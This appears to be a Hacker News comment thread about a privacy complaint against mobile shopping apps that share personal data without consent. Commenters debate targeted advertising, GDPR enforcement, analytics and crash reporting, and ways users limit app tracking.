I use these store and delivery apps extremely often. I have issues with their tracking of my behavior but I don't consider them to be advertising at all.
I opened the app because I wanted to see the products and offers. That's not advertising, that's information which I specifically requested. Advertising is when the app gets in my face with nonsense I couldn't care less about while I'm trying to do something else.
Well, I go to Instagram to spend surplus time which I was gonna waste anyway. If instagram shows me an ad which it thinks fit my demographics and helps me improve my lifestyle, it is a win-win for all 3 parties [aggregator, sellers, buyers] involved. I don't care how I reached there. I am knowledgeable enough to distinguish what is relevant to me. Amazon results are litered with ads. It is similar how to Walmart would preselect products for you and you have little to no-choice among them. Do you get a personal choice in what should be put on shelf. Walmart does the selection based on internal data it gathered. It can build a profile on you.
So you ended up spending money that you were not planning to spend in the first place, because the advertisers succeeded in provoking in you a sense of necessity where none existed before.
I would rather keep advertisements specifically restricted only to those who already have a need, and are interested in choosing a commercial solution for that need.
I earn money to make my life better, not to just increase a number in my bank account. I hope you understand the concept of surplus income. Otherwise we can go back to stone-age "just existing", "being in the moment and intimate with raw sensations" as nature intended to be.
To take your point further, why not abolish, ban luxury market segment. A $10 shirt does the same job of $500 one. Well Apple created a necessity in making you to buy a $1000 dollar phone, it does the same job as $400 one.
I would allow market place to decide what new ideas should take hold in society. Taking an uber or online dating was frowned upon, not anymore. People can change, society can adapt, better processes can be put in place to avoid hurt sentiments of all parties involved.
I do not advocate to abolish or ban any market segment, but rather to limit their ability to advertise only to individuals who are already on the market for the kind of product or service being advertised.
Also, congratulations on your surplus income. Many people do not enjoy that luxury.
Well, I search for products I want constantly. I'll describe what I want to Google or an actual salesperson and see what comes up. Then I'll refine the results if necessary. I don't consider that advertising. I'm looking for information and others are supplying me with it.
Well then you are dependent on the particulars of the search engine algorithms and what it surfaces to you. This is similar to Walmart preselecting 3 products from a category and asking you to make a choice among them. I would love to have some diversity in it.
Diversity is provided by friends and family. Trusted human beings. Not the highest bidder in the auctions for our attention.
Also, without advertising, search engines and the web would be a lot more trustworthy than they are today. When searching I used to get many real websites created by humans, now I see ad-funded AI-generated utterly worthless SEO spam. Advertising is literally the root cause of the enshittification of the web.
Limited number of family and friends and their limited exposure to the products they have personally experienced is too limited for me. I would like to atleast check out what is out there. Then do research and then buy. Don't project your personal way of doing things onto others.
I consider advertising to be fundamentally different from word of mouth networks and friend recommendations. Friends do not have conflicts of interest. They recommend things to you because they like it and think you would too, not because they stand to make billions in profit.
Advertisements are inherently untrustworthy: you must assume ads are showing you the positives and hiding the negatives.
People are generally exposed to reviews by third parties. They do their research and only then buy. Most products can be replaced / returned if you are not satisfied. Limited friend circle and their limited exposure to existing and new products should not be a determining factor in deciding what should I like or not. It should be my personal decision.
Politicians / media are inherently untrustworthy. Yet society chugs along.
It’s not as simple as the dichotomy you’ve presented. I exercise all the agency I can summon to avoid seeing ads, yet still I am presented with them and tracked so that companies can present them to me. If I had the choice I would deny them any ability to track me. So, don’t I lack some agency here? Is it my fault? And if I see an image or text I am not prepared for, my lower perceptual faculties process it before my prefrontal cortex can reason about it. Advertisers and psychologists know this, it’s why they keep doing what they do, because it works.
> If you asume agency of the user then this is a good thing, a win-win. But by treating this negatively you are asuming that the user has no agency over their actions.
Some people don't have complete and absolute agency, impulsive buying is a known issue. I bring this up because I have to constantly monitor my impulsivity due to ADHD, it creates a struggle when targeted ads bombard me with interesting stuff that I don't need but my brain tells me "but it could be useful for X".
It's exhausting, I don't want it (or at least would like to have more control over) but I can't shield myself completely from targeted ads, ad blockers on the web help a lot, and I should completely avoid popular apps with targeted ads like Instagram. I would like to see what my close friends are up to on their Instagram Stories but I simply shouldn't use it as I normally get bombarded by "interesting" ads all the time which drains me by constantly battling impulsivity.
>Targeted ads increase revenues because they are focused on people with a higher proabability of responding positively to the ads. If you asume agency of the user then this is a good thing, a win-win. But by treating this negatively you are asuming that the user has no agency over their actions.
That's hand-wavy and not entirely true. I have full agency and still it's easier to ignore or mentally block out an ad about cattle supplements (I don't own cattle) than it is an ad about an accounting conference (I need continuing education credits for my CPA).
Ads are interruptive by design. The more targeted an ad is, the more it slows me down in my day. That is bad for me
It's not about temptation. It's about not wanting to see ads. I don't care to know about what the ad people want to show me, and I resent being shown ads at all.
If I want a product I'll search for it. I don't want things coming to me, I want to go to them.
Without ads, how are companies supposed to get the word out about their product?
Email seems like a worse medium. Calls / texts even worse. Blog spam / SEO content is maybe the least worst? Paid (biased) reviews?
Without ads, we'd probably see a lot more paid placements (which might not be labeled as an advertisement, similar to food companies buying prime shelf space in supermarkets unbeknownst to shoppers). More influencers pushing brands directly to audiences (another form of paid placements).
I won't argue that ads are a good thing, but they serve a role in the economy. It's not obvious to me what would happen if companies suddenly couldn't advertise anymore.
E.g. you open a new restaurant. Is it ok for a restaurant to geotarget ads to the local residents? Buy an ad in the newspaper? Or do we say "not allowed" and rely on word of mouth?
If that was what advertisement was all about, maybe we wouldn't care so much.
But in the majority of cases those advertisements are lies. Fake photos, fake reviews, fake claims, fake everything. I can't justify accepting all that lying just to "get your word out". That's not what's being done.
Paid placements are already ubiquitous.
The restaurant example is all about the small company, which already gets screwed with current marketing landscape. They put tons of money into a black box with Google/Meta Ads hoping it'll work. They say X amount of people saw your ad, most of the times you can't track any real effect from these ads, and you have to accept it. The recent issues with YouTube counting ads incorrectly is most certainly not a unique incident and we have no clue what's actually happening.
Maybe if all we had were these small local businesses advertising it could actually be useful. After all, those are not the ones collecting copious amounts of data violating everyone's privacy for the sole purpose of selling ads.
Perhaps a version of opt-in ads or trustworthy places where you can get real recommendations are the way to go. But because of ads and SEO now this was also destroyed. I find it infuriating that when you do want to buy something, you have to sift through so many garbage lists created for the sole purpose of showing ads and referrals. Ultimately you can only really trust a few experts sources for basically anything. The normal folks who fall for the "top X" list websites or the ads get screwed the same way because those are just another form of false advertisement.
I don't know if there's a perfect solution here, but it damn well isn't the one we've got.
> Perhaps a version of opt-in ads or trustworthy places where you can get real recommendations are the way to go.
Also unfortunate on the B2B side, sites like G2 and Capterra (basically yelp with B2B) have both turned into pay to play.
Then again, I’m not even sure what a realistic business model would be for a unbiased review site. (Maybe the answer is it shouldn’t have a business model at all)
The profit motive inevitably destroys these types of businesses.
There's a reason threads here on HN in the category of "what did you buy/read/do recently?" are so popular. People want reliable information that advertisement is definitely not giving us.
Thinking about it, nothing beats recommendation from a known trusted individual. Be it for a restaurant, an appliance, a car, etc.
This tells me how little advertising is about the discoverability of products/services. This creation of needs is 99.9% of the time unnecessary. It's only there because people want to sell regardless of how useless their product is.
If people need something, they will search for it.
Ads are the problem not for those who click on ads and feel excellent about it, but for those who don't and get unwanted content shoved down their throats. If the "higher probablity" from your comment is tiny, which it is, then the latter group is roughly the same as that exposed to generic (and equally unwanted) ads.
That is, profiling does very little for the vast majority users, but at a cost of massive privacy issues. Trying to look at one without considering the other is disingenuous at best.
> If you asume agency of the user then this is a good thing, a win-win.
I think a relevant difference is between "intent" related ads, say keyword ads on Google: I search for a thing and get the related info. There are cases where this is okay and helps to discover things.
And the pure tracking based ads, trying to influence me to do things I didn't inherently plan to do.
I heavily dislike the life manipulation, which often enough also seems to work. (As proven by bug companies spending tons of money on ads)
Or in a different realm: I'm fine with political parties having room to share their ideas and goals and advertise for them, but if companies use targeted ads to send very specific ads to different demographics, there can't be a proper debate anymore as everybody saw something different (maybe even contradicting) and don't know where others are becoming from (see Cambridge Analytica) This is absolutely harmful for society.
The article suggests that advertising works by manipulating cultural norms, but then it would not seem to work if ads were targeted to individuals and not to the population as a whole. For instance, the cited ad (Corona beer at the beach) was in fact widely distributed without individual targeting.
Also, the fact that misinformation campaigns work suggests that misinformation is at least one possible purpose of advertising.
I'd say the article is more about non-targeted ads, but nitpicking the example doesn't really help.
An ad can target an individual about their dandruff issue which only works because previously the non-targeted ads created social stigma around it. It's all connected.
Ads are fucking evil. No amount of rationalization can get around that. The only reason we even attempt to normalize this is because we have to generate profits at all costs.
I'd argue misinformation is embedded into advertising. There's a reason "honest ads" are a meme. Aside from a few exceptions, misinformation is the entire point of the ad: buy my thing because it's the best (it isn't) and will solve all your problems (it won't) and if you don't you're a loser (you aren't).
I have a different opinion on behavioural tracking: in most cases and contexts human behaviour is very low entropy; each person is unique and so on but we are also quite predictable and malleable and in many situation we collapse into far fewer modalities of behaviour.
By gathering enough data it become possible to predict more and more of our individual behaviour; I believe that keeping this as hard as possible is a noble cause.
What agency does a lone sheep have against a pack of wolves? The issue is information asymmetry. The corporations have many more resources available to convince me to buy their product than I have when deciding how to spend my money.
When I'm asked for permission to "share data with a third-party" I want to know who that third-party is? Will it be the same tomorrow as it is today? What will the third-party do with the PII? If the third-party is someone I trust and would value a working with then I might agree to it. But it's just as likely to be an organization I detest. The information is out there in press releases, journals, and legal documents. But collecting, compiling, and cross-referencing isn't something that can be done on the spot when that consent prompt is displayed. How am I supposed to make an informed decision on how to answer?
Restricting what advertisers can do isn't taking agency away from me. It's giving me the support to better exercise my choice against better armed adversaries.
Used to feel similarly, and extrapolated this sentiment to drugs, gambling, and other vices. Quite a grim realization, but without the shaming, the banning, the control, people will allow "their agency" to take them places that only cause them and others harm. This is why law, shaming, and religion are important, because they are strong forces that protect people from "their agency", and the ills it can cause.
Who has more agency, who is more free here: a man who is a drug addict or a man who isn't a drug addict but otherwise would be without drug laws and shaming?
You may say the drug addict has more agency. You might be right, but it's not good for him or his family, and that's where law and shame come in to protect him from "ill-agency".
>This is the line of reasoning behind banning the sale of addictive substances to minors
> Targeted ads increase revenues because they are focused on people with a higher proabability of responding positively to the ads.
I have no problem with targeted ads, in fact I prefer them. If I'm browsing a climbing subreddit, show me ads for climbing gear. If I'm searching for luggage online, show me ads for suitcases.
What I strenuously object to is sharing data outside of a specific vendor. If I'm browsing for suitcases on eaglecreek.com, Google and Facebook should never know and never be able to serve me any ads based on something I did outside of their services.
We do not have "agency" in the sense of a magic black box which makes optimal decisions regardless of the information we have, nor "no agency" in the sense that we'll immediately do anything because ads tell us to, but ads are incentivized to exploit human psychology as much as possible and being exposed to that is probably bad.
"You are seeing this ad on ShittySite.com because you clicked on an article about new cars on NewsSite.com 13 days ago and searched for 'Tesla' 10 days ago and subscribed to the 'Car Buyers' newsletter 8 days ago and viewed a video about used cars 7 days ago and ..."
Unfortunately, despite having appropriate laws for many years, these privacy rules are broken en masse. And why? If every EU country would simply check their top 1000 websites (and apps) pro actively, this would problem would not exist. Now we have the situation that everybody does it so you would be stupid not to follow.
Something similar with unsolicited mailing (both snail and e), the rules are clear but trampled by small and large companies and institutions.
It is not that this government lacks the expertise or creativity. Yearly aerial images are collected to search for illegal buildings and extensions. The same government's tax department actively scrapes the web and social media to collect and store personal data to create a fraud profile on all their citizens.[0]
Regulation that is not thoughtful and enforceable is not good regulation.
Spam was made “illegal” more than a decade ago in the US and in the EU. It did not reduce the amount of spam. The same thing with GDPR: only honest and good actors suffer, while dishonest actors or megacorps like Google get an advantage and because of this advantage they manage to grow their business.
For small companies the rules, especially on cookies, are intimidating and therefore ignored - however because are small so is the impact of it. For larger companies, the financial incentive to bend the privacy rules is significant. And there are the evilCorps like Uber who have a trample the rules strategy [0] (and any platform that abuses workers rights). Not sure how this relates to privacy rules, but it feeds the assumption that if a company ignores one set of rules, they are also inclined to break other rules.
An interesting niche I have worked in, social enterprises, a lot of people have a strong moral high ground feeling. Their message is supposedly not commercial, or it has importance while in fact it is still commercial (fund raising, an event, ...). And especially these companies get a lot of attention.
why the distinction? if spam is illegal, it doesn't matter your size or incorporation status. if you break the rules, you've broken the rules. the ability to spam doesn't really increase by size of corp. a single person can hire services to spam just as effectively has evilCorp
Because an inversion of responsibility happens at some turning point of organization size.
A small company that wants to survive has to spend a lot of effort and engineering hours becoming compliant with the legislation. If they fail to do so, the following legal battle and potential fines have a high probability of bankrupting them. They must be proactive to avoid this.
Large corporations instead get to be reactive. They comply where it’s convenient and otherwise operate on an “ask forgiveness later” mindset. Legal battles and billion dollar fines barely register and instead of becoming destructive events, just become minor taxes on doing business.
As much as I appreciate the spirit of the legislation, the implementation has actually empowered large companies and is squeezing out small business.
In the case of being a small business, it’s not even about being shady. Imagine you were building a simple step tracking database for a pedometer app. All it does is store a user id and some daily steps. You have zero intent to market or share it in any way, no ad personalization, no third parties, etc. Before GDPR you’d just spin this up and be fine. Now you need to deal with data consent policies, data deletion tools, potential exfiltration policies if your DB isn’t in the EU, etc. Enjoy the engineering and legal costs there.
Mega corp can just ignore most of this and pay later. It’s a massive difference.
there's no need to transmit the collected data away from the device. boom! nobody is storing data. it's all local to the device. that's an easy decision to make. you don't even need to collect an ID of any type. this app on this device counted steps. nobody outside of the app on that device needs to know.
transmitting that information to the company servers is a decision that can easily be not made to do, and when it is, you're already at risk. so, why do it?
or third party owned eavesdroppers. Some contexts are leaving little option (all products demanding privacy loss): this is where the big battle will lie.
I used to use Viber for calls outside the EU, and briefly after the GDPR was implemented, I checked their data partners, I kid you not, more than 1000 data harvesting companies were listed there. Keep in mind, Viber has acess to so many permissions on Android, it's freaky even if they didn't have this many partners (I had XPrivacy back then). Can't imagine how compromised the regular users are.
I uninstalled that malware a long time ago despite everyone around me using it. Years ago when I still had it, I found that they've been transmitting all my data - including messages apparently - to Facebook. I found this in the FB privacy console, as Viber would have never told me explicitly.
To your second concern... can't you now disable all those permissions individually? Not allowing you to then proceed with using the app would break their Google Play developers agreement, I assume. I hope.
There are plenty of other "hidden" permissions that are not exposed to user control. This include, but not limited to, the closest tower nearby you, the SSIDs around you, access to the list of apps installed, etc ... While the Android permission settings gives the illusion of "privacy", the reality is far more bleak. If you ever dip your toes in Android App Development you would know. But even now, relying on XPrivacyLua to handle the permission blocking. Don't even get me started on Apple and their illusion of privacy. At least with Android you can tailor an AOSP Rom to your liking with minimal Google apps, but with Apple, they don't even allow you to disable location from the Quick Settings menu.
But overall, nowadays it's at least possible to limit the impact – compared to Lollipop era for example, when everything suddenly started to look modern, unified and nice, but still full of the same old holes.
Generally I like what noyb does, but I dislike how advertisement and product analytics seem to be thrown into the same basket. There are third-party companies like Mixpanel and Amplitude that you can send your users' data to, but they will only process it for you, and not for anyone else. Same with third-party companies like RevenueCat that help you with implementing in-app purchases. Very different situation than sending data to Google or Facebook who will then use it for everything they do.
> There are third-party companies like Mixpanel and Amplitude that you can send your users' data to, but they will only process it for you, and not for anyone else.
These tools are increasingly developing new features that allow them to act more like a "CDP", essentially allowing you to send data from the tool to something else.
The objective of the GDPR is to give the data subject better control over how their data is used. Maybe the user doesn't want you to stalk them for analytics or "product improvement" (biggest tech industry lie of the past decade), regardless of whether other third-parties also get in on the action?
I hardly think something like a crash report diagnostic is stalking, though. Maybe you could make the case for transaction conversion funnels. That’s really a case by case basis for which analytics provider is being used and how the product owners consume them.
If your crash report service is reporting personal data, then your crash report service is written incorrectly from the perspective of respecting user privacy.
I’ve developed crash reporters for years now. The only way personal information is making its way into crash reports is if the app developers put it there. Otherwise it’s function names, the OS version, binary images that were loaded into the app, the time it happened.
Certain termination reports do contain small memory dumps and/or register values, so theoretically could could contain decodable PII. This is something the OS vendor provides, not the developer of the app or the crash reporter.
I didn't mean to make it seem like I'm calling you out specifically, just thought it worth clarifying that there's no a priori reason that PII should be included in a crash report. Sounds like we agree.
Crash reports often include pseudonymous information, like device type, OS version etc., that help you understand the environment your crash occurred in. They also very often include identifiers that aren't personal, but allow you to understand whether this crash that happened 100 times happened for 100 users or just 100 times for the same user all over. That's very important information to have when debugging. The verdict is still out in many legal jurisdictions on whether such pseudonymous information is private enough. The classic example is IP addresses.
Pseudonymous information always has a high risk of being abused for fingerprinting and thus denonymising. I feel that there needs to be a trade-off though: on public datasets, people should be very careful with pseudonymous identifiers. On things like crash diagnostics that are never meant to be shared I feel they're perfectly fine. That's why I dislike a general discussion where all PII is bad and evil without context.
Absolutely agree! I’ve pushed back in the past when more analytics-type data was being considered. It can definitely be done anonymously and I believe users should always be given transparent options.
My stance is that by grouping all of them into the same bucket, we stop differentiating. And asking average users to make an informed, differentiated decision on a topic as complex as this feels wrong.
I get why you need legal arguments to prosecute organisations that abuse the system, but I’m worried that’s the wrong focus for now. Companies handling data will always have enough lobbyist to make their particular way of doing things technically legal (“we didn’t sent ID, we shared hashes”).
What they should be judged on is whether people understand what they are doing, and if that clarity empowers people to support advertising approaches. Several generations of technologists have dreamed of a user-controlled platform to broadcast information, like “I’m in the market for a toaster” and get relevant offers. Ad markets and platforms would not make less money if they empowered users to tell you what they are interested in and to stop showing ads about crypto and gambling.
> their particular way of doing things technically legal [... e.g.] shared hashes
Yes, sometimes, but an important part of it is blunt: see the post in this page of the user who installed a controversial communication application (not WsA) and found that the messages were forwarded to FB... ( https://news.ycombinator.com/item?id=37506851 )
> whether people understand what they are doing
Yes. Partially it is a matter of awareness. But there is also a large part of the population which does not care about privacy - which also reveals a perception of the world that may be outdated ("nothing to hide to decent authorities" is the idea that many hold because usual to them).
I would argue that if they think there’s no risk in sharing detailed personal information with authorities, they also need to understand. Privacy advocates are better at making that case, but it hasn’t always easy to hear.
> Companies handling data will always have enough lobbyist to make their particular way of doing things technically legal (“we didn’t sent ID, we shared hashes”).
> What they should be judged on is whether people understand what they are doing
Nope, it's waaayy easier to regulate this at the root of the problem rather than going person by person asking if they understand a 15-page legalese EULA they did not read.
DuckDuckGo App Tracking Protection is an app which can raise your awareness of what tracking the apps on your smartphone are doing, and probably give you a fright in the process!
Last week it blocked 31000 attempts to track me by apps on my smartphone.
I use and love DuckDuckGo Android app! The browser part suits my workflow very well. The pinned favorites, the tabs not accumulating forever like in Chrome, it's just great all around!
But it's not as privacy-friendly as you'd think. For example all favorites and bookmarks favicons are routed through their server. Which would be nice as an option, but you can't opt out. They pinky-swear they don't log it, though.
We desperately need OS level user configurable firewalls.
I need to be able to download an app and tell the OS “this app cannot access the internet in any way shape or form”.
It won’t solve all the problems. But at least for apps like “alarm clock” or whatever that should be able to work offline, the OS should guarantee it remains offline.
> We desperately need OS level user configurable firewalls
(I co-develop a FOSS network monitor for Android)
Yes, but: "OS level" firewalls are as weak as the OS itself (as in, if an app gets root, all the sandboxing and firewalling is pretty much done for). One probably must use an external firewall for better protection, but the problem is of course, one can't expect to carry it around everywhere. While for smartphones, the external firewall (fronting an AP / Wifi) is bypassed when using mobile data.
For unprivileged installed apps (as opposed to OEM apps), perhaps a un-rootable OS-level firewall works.
Also, fines are an abstract punishment—even more so when applied to a business. The C-suites need to start evaluating decisions knowing their personal freedom is at stake—not a number on a balance sheet.
I realized, after talking to a bunch of people about this, that people outside of Hacker News just don’t care about privacy. It’s unbelievably sad to me. I don’t see any solution in sight without regulation, and that simply isn’t even being discussed in the US (based on a cursory scan of active bills being considered)
This article explicitly mentions 3 apps running on Android. The headline creates the assumption it involves iOS as well, as well as other Android apps, but this does not appear in the article at all.
Would be nice if there was a sandbox app that could run any app and produce a list of resources the app had accessed and actions it has taken. Bit like running a s program under strace on Linux.
Android technically offers that - the actual permission list that apps need to declare is a lot larger than what gets shown to the user.
Google only shows the most egregious permission flags in normal Android builds. They also for some reason opted to bundle a few completely unrelated permissions into the phone call permission notification (iirc it's for example the notif shown if you want access to bluetooth devices).
I think there's a few XPosed plugins that let you show prompts for the ones Google doesn't let you decide on if you don't want to go full custom ROM. They can also feed fake data so your personal data isn't compromised.
I think some of it could be the unthinking inclusion of 3rd party libraries that seems to go all through the mobile dev community.
Just thinking of crashlytics, which is incredibly popular, and on it's own, isn't terribly invasive. But of course, google now owns it, so every time you go to your console, google is constantly pushing some further invasion of privacy to improve your insights.
There's load of things, even apart from deliberately malicious libraries, that will use analytics to fund their free tools. What do you know about your easy to implement cloud synching db that saves so much time?
That's why I always avoid installing any apps on my phone, if I can live with a website version. Yes, websites also try to collect as much as they can, but at least there I have a browser sandbox and a possibility to use an uBlock Origin.
Of course, the issue is always with other apps that don't have a website version and require the internet to work. There, one needs to be much more careful about what he installs, and to prefer open source when possible.
Oh yeah I never use them. I did notice McDonalds does try to push you to their app on their ordering kiosks, and they removed some kiosks to make it more difficult to order in person. But I didn't cave in :) I generally hate apps, I'm a real computer guy.
> The companies’ apps illegally access and share users’ personal data with third parties for sophisticated analytics as soon as the apps are opened. Users don’t even have the choice to consent to or prevent the sharing of their data. This approach is unlawful.
Unlawful - true. But also no different than your usual website attempting to load Google Tag Manager, Analytics or some Facebook garbage before user has a chance to consent.
What can I do as a developer to offer that choice to the user, before it loads? What can I do about the transitive dependencies that my dependencies load?
> What can I do as a developer to offer that choice to the user, before it loads?
Don't load it until you have given the choice to the user. Dynamically load after that, or wait for the next server round-trip.
> What can I do about the transitive dependencies that my dependencies load?
This is a significant problem for which I don't have an easier solution than making a lot of effort to properly audit and monitor your supply chain.
If you aren't sure that nothing in your supply chain is doing something dodgy, how do you justify pushing it to your users (or, at least, doing so without appropriate warning)?
You can for example use analytics that aren't spyware, and hence don't even have to try to trick users giving "consent" to things they don't really want.
> What can I do as a developer to offer that choice to the user, before it loads?
Implement a (sane) version of a cookie banner which sets a cookie containing the information that the user is fine with loading external libraries or not. That cookie itself is classified as a technical cookie if only used for that reason and will not require "permission" from the user. That's how this would be implemented in a GDPR-compliant way.
If the cookie is set, you can load the respective external scripts and tools. If not, you don't.
> What can I do about the transitive dependencies that my dependencies load?
That's trickier one and probably more into the legal side, as in informing the user that those dependencies exist and how they correlate to each other.
This is a reason to why I don't upgrade my iOS version from 15. Partly due to no jail breaks available. And yes, from a security standpoint with the recent exploits, I know.
I have NetFence firewall installed and the amount of API requests to third party systems applications make, including bank applications is surprisingly high. These include sending metrics and telemetry to third parties. Location Data, whether GPS is on or off and these toggles can be seen within the API call.
app.adjust.com
app-measurement.com
eu-aa-online-metrix.net
firebaselogging-pa.googleapis.com
Are just a few domains these app's make a call too. Why?
> Under the ePrivacy Directive, the mere access or storage of data on the user’s terminal device is only allowed if users give their free, informed, specific and unambiguous consent
I'm unsure what they mean by "storage of data on the [...] device" because you can't use an App without having first installed it (which uses your device's storage already), so doesn't the app have reasonable implicit permission to make use of the user's storage?
...while the part about an app being able to "access" stored data is ambiguous: does that include the app reading its own resource/assets data from its installed app-package/directory? Or if it's referring to apps reading from the user's own (i.e. private) data like Contacts database, photos, GPS sensors, etc - then as far as I'm concerned that's not a legal or policy question, but a clear and gaping security hole in the OS because the app was somehow able to break out of the sandbox to read into other data-stores on the user's device.
> so doesn't the app have reasonable implicit permission to make use of the user's storage?
“Implicit permission” does not sound like “free, informed, specific and unambiguous consent”. Furthermore, the directive (ePrivacy, article 5(3)) states that consent is valid only if the user was provided with clear information about the purposes of the processing beforehand.
> does that include the app reading its own resource/assets data from its installed app-package/directory?
An app reading its own data will fall under the “strictly necessary” exception of the directive (cf. ePrivacy 5(3)). Reading other databases will depend on the purpose.
The whole article talks about users' personal data, it isn't about storing data on the device in general. If you read the article from the top I think it's pretty evident.
If an IP is PII (it is for my regulated app in many jurisdictions), perhaps every app is at risk as SDKs generally phone home without being first routed through a server of ours.
From what I understand, you can ask for an IP if it is required for the application's functionality, i.e. "due to technical limitations, we need to know where to send the response", but you cannot automatically use it for marketing purposes, i.e. "sell the IP to third-party advertisers which can then build a profile of that IP's site visiting behavior".
Yep. My fintech serves people with bad financial history. If you’re my customer, your credit score is low and you’ve got an active loan. Simply being my customer is PII. We should be guarding IP addresses as PII.
A couple of years ago I read "The Age of Surveillance Capitalism." Zuboff of thorough and relentless. Couple this sociopolitical manipulation machine with new found AI and it gets even more frightening.
> Max [Schrems, a lawyer and privacy activist] had had the idea of a professional privacy enforcement NGO (similar to consumer rights organizations) that brings cases against large corporations on behalf of the users for a while and was ultimately able to realize it through noyb
On the one hand, I'm glad that organizations like noyb exist. On the other, it's a testament to the failure of enforcing privacy regulations, where we need to have organizations hunt down flagrant perpetrators. It would be akin to relying on vigilante groups to enforce common laws, instead of having federal law enforcement agencies.
I assure you that if we didn't have these closed ecosystems, we would have more secure software. Data exfiltration is a security issue, perhaps even the most significant one. All the theatre we do with signing software was better implemented in your average software repository all linux distributions come with.
Failing to see the larger picture people wanted these enclaves. An no, even Apple wants to make their environment attractive and that means appeasing advertisers.
Overall the behavior of legitimate software in a PC or Mac environment is just far better, it isn't even a competition.
All they had to do was to legislate a statutory amount someone could claim in case of a privacy violation and the problems would've disappeared overnight by companies set up to litigate on behalf of consumers in exchange for a cut.
the fact that in the U.S you can sue larger and more powerful organizations for their having harmed you is a clear benefit in comparison to some European systems (the way this works can vary between land).
In Denmark and I assume in Norway if you have been harmed by a governmental organization you have to complain and spend lots of time to deal with the problem and in the end get nothing for the time, you get a worthless apology and change of policy for what harmed you in the first place, and then wasted years, and nothing is done to right the hurt or damage you suffered.
Better the American way as an opportunity, however limited, to make the powerful suffer in kind.
Would it be bad in this case? We have a chronic problem of lack of GDPR enforcement and it's clear regulators are underfunded/incompetent/overwhelmed/not interested in doing their job.
If the regulators can't, let someone else do the job.
Sounds like a good reason to roll legislation that legally mandates that all this data should go through a centralised authority. Which will make for even easier collection that would be enshrined in law.
Unfortunately, all this stuff is going in one direction.
> How mobile apps illegally share your personal data
There are many different methods you can use to share a file, including but not limited to Dropbox and floppy drives. Your data is a file, or maybe it's an SQL table! Sharing a file can be done by anyone, but be careful though, as sharing an SQL table needs to be done trained professionals. DO NOT ATTEMPT SHARING AN SQL TABLE WITHOUT PROPER SUPERVISION.
Seriously, what's the news/content here? Is mobile apps not complying with EU regulations noteworthy in any way?
It's not about the format of the data, but the content. Personal Information (PI) can only be shared with consent, and only for clearly specified purposes. That's the Bad Thing they're reporting on, albeit somewhat poorly.
And there's strong(er) privacy laws is California USA, the EU, Switzerland, and the UK. That's just off the top of my head. So not just EU law being broken here.